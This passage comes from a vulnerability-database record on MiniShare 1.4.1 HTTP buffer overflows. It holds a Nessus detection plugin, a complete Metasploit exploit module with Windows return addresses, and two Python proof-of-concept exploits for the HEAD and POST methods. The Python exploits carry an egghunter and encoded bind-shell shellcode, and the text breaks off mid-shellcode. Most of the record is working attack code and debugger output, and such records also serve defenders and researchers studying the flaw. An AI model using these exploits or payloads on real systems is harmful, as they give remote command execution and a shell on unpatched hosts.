fix version detection\n# - added CVE xrefs.\n# - revised plugin title, changed family, update output formatting (8/18/09)\n\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(18424);\n script_version (\"1.24\");\n script_cve_id(\"CVE-2004-2271\");\n script_bugtraq_id (11620);\n\n script_name(english:\"MiniShare Webserver HTTP GET Request Remote Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote buffer overflow \nvulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"MiniShare 1.4.1 and prior versions are affected by a buffer overflow \nflaw. 
A remote attacker could execute arbitrary commands by sending a\nspecially crafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2004/Nov/248\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MiniShare 1.4.2 or higher.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Minishare 1.4.1 Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/06/06\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/11/07\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"MiniShare webserver buffer overflows\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2020 SensePost\");\n script_family(english:\"Web Servers\");\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# Code Starts Here\n#\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\n\nif(get_port_state(port))\n{\nres = http_get_cache_ka(item:\"/\", port:port);\nif( res == NULL ) exit(0);\nif 
(\"<title>MiniShare</title>\" >!< res)\n exit (0);\n\nif (egrep (string:res, pattern:'<p class=\"versioninfo\"><a href=\"http://minishare\\\\.sourceforge\\\\.net/\">MiniShare 1\\\\.(3\\\\.([4-9][^0-9]|[0-9][0-9])|4\\\\.[0-1][^0-9])'))\n security_hole (port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-08-02T23:04:08", "description": "This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack buffer overflow that requires a \"jmp esp\" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.\n", "published": "2005-12-26T14:34:22", "type": "metasploit", "title": "Minishare 1.4.1 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/HTTP/MINISHARE_GET_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Minishare 1.4.1 Buffer Overflow',\n 'Description' => %q{\n This is a simple buffer overflow for the minishare web\n server. This flaw affects all versions prior to 1.4.2. This\n is a plain stack buffer overflow that requires a \"jmp esp\" to reach\n the payload, making this difficult to target many platforms\n at once. This module has been successfully tested against\n 1.4.1. 
Version 1.3.4 and below do not seem to be vulnerable.\n },\n 'Author' => [ 'acaro <acaro[at]jervus.it>' ],\n 'License' => BSD_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2004-2271'],\n [ 'OSVDB', '11530'],\n [ 'BID', '11620'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x40\",\n 'MinNops' => 64,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp\n ['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp\n ['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret\n ['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret\n ['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret\n ['Windows 2003 SP1 English', { 'Rets' => [ 1787, 0x77403680 ]}], # jmp esp\n ['Windows 2003 SP2 English', { 'Rets' => [ 1787, 0x77402680 ]}], # jmp esp\n ['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp\n ['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp\n ['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp\n ['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp\n ['Windows XP SP3 French', { 'Rets' => [ 1787, 0x7e3a9353 ]}], # jmp esp\n ],\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 30\n },\n 'DisclosureDate' => 'Nov 7 2004'))\n end\n\n def exploit\n uri = rand_text_alphanumeric(target['Rets'][0])\n uri << [target['Rets'][1]].pack('V')\n uri << payload.encoded\n\n print_status(\"Trying target address 0x%.8x...\" % target['Rets'][1])\n send_request_raw({\n 'uri' => uri\n }, 5)\n\n handler\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/minishare_get_overflow.rb"}], "zdt": [{"lastseen": "2018-12-12T05:53:18", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2018-12-08T00:00:00", "title": "MiniShare 1.4.1 HEAD / POST Buffer Overflow Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-19862", "CVE-2018-19861", "CVE-2004-2271"], "modified": "2018-12-08T00:00:00", "id": "1337DAY-ID-31748", "href": "https://0day.today/exploit/description/31748", "sourceData": "Hi!!! playing in 2006.... I have adapted the exploit to python\r\n\r\nNot only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST\r\nmethods are also vulnerable. The difference is minimal, both are exploited\r\nin the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length\r\n\r\n-------------------------------------------------------------------\r\n\r\nEAX 00000000\r\nECX 77C3EF3B msvcrt.77C3EF3B\r\nEDX 00F14E38\r\nEBX 43346843\r\nESP 01563908 ASCII\r\n\"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co\r\nHTTP/1.1\r\n\"\r\nEBP 0156BB90\r\nESI 00000001\r\nEDI 01565B68\r\nEIP 68433568\r\nC 0 ES 0023 32bit 0(FFFFFFFF)\r\nP 1 CS 001B 32bit 0(FFFFFFFF)\r\nA 1 SS 0023 32bit 0(FFFFFFFF)\r\nZ 0 DS 0023 32bit 0(FFFFFFFF)\r\nS 0 FS 003B 32bit 7FFDD000(FFF)\r\nT 0 GS 0000 NULL\r\nD 0\r\nO 0 LastErr ERROR_SUCCESS (00000000)\r\nEFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)\r\nST0 empty\r\nST1 empty\r\nST2 empty\r\nST3 empty\r\nST4 empty\r\nST5 empty\r\nST6 empty\r\nST7 empty\r\n 3 2 1 0 E S P U O Z D I\r\nFST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOnly 210 bytes to 
shellcode\r\n\r\n------------------------------------------------------------------------------\r\n\r\nBadchars '00','0d'\r\n\r\n------------------------------------------------------------------------------\r\n\r\n>findjmp kernel32.dll esp - XP SP 3 English\r\n\r\nScanning kernel32.dll for code useable with the esp register\r\n0x7C809F83 call esp\r\n0x7C8369E0 call esp\r\n0x7C83C2C5 push esp - ret\r\n0x7C87641B call esp\r\n\r\n\r\n<!--\r\n# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.\r\n# Date: 05-12-2018\r\n# Exploit Author: Rafael Pedrero\r\n# Vendor Homepage: http://minishare.sourceforge.net/\r\n# Software Link: http://minishare.sourceforge.net/\r\n# Version: Minishare v1.4.1\r\n# Tested on: Windows\r\n# CVE : CVE-2018-19861\r\n# Category: exploit\r\n\r\n1. Description\r\n\r\nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\r\nexecute arbitrary code via a long HTTP HEAD request.\r\n\r\n\r\n2. Proof of Concept\r\n\r\nExploit:\r\n\r\n#!/usr/bin/env python\r\nimport socket\r\nimport struct\r\nimport os\r\n\r\n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\r\nexecute arbitrary code via a long HTTP HEAD request - by Rafa\r\n# CVE: CVE-2018-19861\r\n# Via Egghunter because shellcode in ESP only 210 bytes long.\r\n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/\r\nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nhost = \"127.0.0.1\"\r\nport = 80\r\n\r\n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34\r\negghunter =\r\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n\r\n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f\r\npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c\r\n#Found 10 compatible encoders\r\n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai\r\n#x86/shikata_ga_nai 
succeeded with size 355 (iteration=0)\r\n#x86/shikata_ga_nai chosen with final size 355\r\n#Payload size: 355 bytes\r\n#Final size of c file: 1516 bytes\r\n#unsigned char buf[] =\r\nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\r\n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\"\r\n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\"\r\n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\"\r\n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\"\r\n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\"\r\n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\"\r\n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\"\r\n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\"\r\n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\"\r\n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\"\r\n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\"\r\n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\"\r\n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\"\r\n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\"\r\n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\"\r\n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\"\r\n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\"\r\n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\"\r\n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\"\r\n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\"\r\n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x1
6\\x6c\\xcb\\x66\\x3f\\xe5\"\r\n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\"\r\n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\")\r\n\r\n# findjmp kernel32.dll esp - WinXP SP3 English\r\n#0x7C809F83 call esp\r\n\r\nnops = \"\\x90\" * 16\r\n\r\njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 -\r\n1786 - 4 - 16 - len(egghunter))\r\n\r\ntry:\r\nprint \"Sending exploit...\"\r\nconnection.connect((host,port))\r\nbuffer = (\r\n\"HEAD \" + junk + \" HTTP/1.1\\r\\n\"\r\n\"Host: \" + shellcode + \"\\r\\n\\r\\n\")\r\n\r\nconnection.send(buffer)\r\nconnection.close()\r\nprint \"\\nExploit Sended \", len(buffer)\r\nexcept:\r\nprint \"Connection error\"\r\n\r\n\r\n\r\n3. Solution:\r\n\r\nThis product is deprecated\r\n\r\n-->\r\n\r\n\r\n<!--\r\n# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.\r\n# Date: 05-12-2018\r\n# Exploit Author: Rafael Pedrero\r\n# Vendor Homepage: http://minishare.sourceforge.net/\r\n# Software Link: http://minishare.sourceforge.net/\r\n# Version: Minishare v1.4.1\r\n# Tested on: Windows\r\n# CVE : CVE-2018-19862\r\n# Category: exploit\r\n\r\n1. Description\r\n\r\nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\r\nexecute arbitrary code via a long HTTP POST request.\r\n\r\n\r\n2. 
Proof of Concept\r\n\r\nExploit:\r\n\r\n#!/usr/bin/env python\r\nimport socket\r\nimport struct\r\nimport os\r\n\r\n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\r\nexecute arbitrary code via a long HTTP POST request - by Rafa\r\n# CVE: CVE-2018-19862\r\n# Via Egghunter because shellcode in ESP only 210 bytes long.\r\n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/\r\nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nhost = \"127.0.0.1\"\r\nport = 80\r\n\r\n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34\r\negghunter =\r\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n\r\n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f\r\npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c\r\n#Found 10 compatible encoders\r\n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai\r\n#x86/shikata_ga_nai succeeded with size 355 (iteration=0)\r\n#x86/shikata_ga_nai chosen with final size 355\r\n#Payload size: 355 bytes\r\n#Final size of c file: 1516 bytes\r\n#unsigned char buf[] 
=\r\nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\r\n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\"\r\n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\"\r\n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\"\r\n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\"\r\n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\"\r\n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\"\r\n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\"\r\n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\"\r\n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\"\r\n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\"\r\n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\"\r\n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\"\r\n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\"\r\n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\"\r\n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\"\r\n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\"\r\n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\"\r\n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\"\r\n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\"\r\n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\"\r\n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\"\r\n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\"\r\n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\")\r\n\r\
n# findjmp kernel32.dll esp - WinXP SP3 English\r\n#0x7C809F83 call esp\r\n\r\nnops = \"\\x90\" * 16\r\n\r\njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 -\r\n1786 - 4 - 16 - len(egghunter))\r\n\r\ntry:\r\nprint \"Sending exploit...\"\r\nconnection.connect((host,port))\r\n\r\nbuffer = (\r\n\"POST \" + junk + \" HTTP/1.1\\r\\n\"\r\n\"Host: \" + shellcode + \"\\r\\n\\r\\n\")\r\n\r\nconnection.send(buffer)\r\nconnection.close()\r\nprint \"\\nExploit Sended \", len(buffer)\r\nexcept:\r\nprint \"Connection error\"\r\n\r\n\r\n\r\n3. Solution:\r\n\r\nThis product is deprecated\r\n\r\n-->\n\n# 0day.today [2018-12-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31748"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:34", "description": "\nMiniShare 1.4.1 - HEADPOST Remote Buffer Overflow", "edition": 1, "published": "2018-12-18T00:00:00", "title": "MiniShare 1.4.1 - HEADPOST Remote Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-19862", "CVE-2018-19861", "CVE-2004-2271"], "modified": "2018-12-18T00:00:00", "id": "EXPLOITPACK:64B73DAC0A0638D9032B0D40ABD6337C", "href": "", "sourceData": "Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST\nmethods are also vulnerable. The difference is minimal, both are exploited\nin the same way. 
Only 1 byte difference: GET = 3, HEAD and POST = 4 length\n\n-------------------------------------------------------------------\n\nEAX 00000000\nECX 77C3EF3B msvcrt.77C3EF3B\nEDX 00F14E38\nEBX 43346843\nESP 01563908 ASCII\n\"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co\nHTTP/1.1\n\"\nEBP 0156BB90\nESI 00000001\nEDI 01565B68\nEIP 68433568\nC 0 ES 0023 32bit 0(FFFFFFFF)\nP 1 CS 001B 32bit 0(FFFFFFFF)\nA 1 SS 0023 32bit 0(FFFFFFFF)\nZ 0 DS 0023 32bit 0(FFFFFFFF)\nS 0 FS 003B 32bit 7FFDD000(FFF)\nT 0 GS 0000 NULL\nD 0\nO 0 LastErr ERROR_SUCCESS (00000000)\nEFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)\nST0 empty\nST1 empty\nST2 empty\nST3 empty\nST4 empty\nST5 empty\nST6 empty\nST7 empty\n 3 2 1 0 E S P U O Z D I\nFST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\n\n------------------------------------------------------------------------------\n\nOnly 210 bytes to shellcode\n\n------------------------------------------------------------------------------\n\nBadchars '00','0d'\n\n------------------------------------------------------------------------------\n\n>findjmp kernel32.dll esp - XP SP 3 English\n\nScanning kernel32.dll for code useable with the esp register\n0x7C809F83 call esp\n0x7C8369E0 call esp\n0x7C83C2C5 push esp - ret\n0x7C87641B call esp\n\n\n<!--\n# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.\n# Date: 05-12-2018\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://minishare.sourceforge.net/\n# Software Link: http://minishare.sourceforge.net/\n# Version: Minishare v1.4.1\n# Tested on: Windows\n# CVE : CVE-2018-19861\n# Category: exploit\n\n1. Description\n\nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\nexecute arbitrary code via a long HTTP HEAD request.\n\n\n2. 
Proof of Concept\n\nExploit:\n\n#!/usr/bin/env python\nimport socket\nimport struct\nimport os\n\n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to\nexecute arbitrary code via a long HTTP HEAD request - by Rafa\n# CVE: CVE-2018-19861\n# Via Egghunter because shellcode in ESP only 210 bytes long.\n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/\nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = \"127.0.0.1\"\nport = 80\n\n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34\negghunter =\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n\n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f\npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c\n#Found 10 compatible encoders\n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai\n#x86/shikata_ga_nai succeeded with size 355 (iteration=0)\n#x86/shikata_ga_nai chosen with final size 355\n#Payload size: 355 bytes\n#Final size of c file: 1516 bytes\n#unsigned char buf[] 
=\nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\"\n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\"\n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\"\n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\"\n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\"\n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\"\n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\"\n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\"\n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\"\n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\"\n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\"\n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\"\n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\"\n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\"\n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\"\n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\"\n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\"\n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9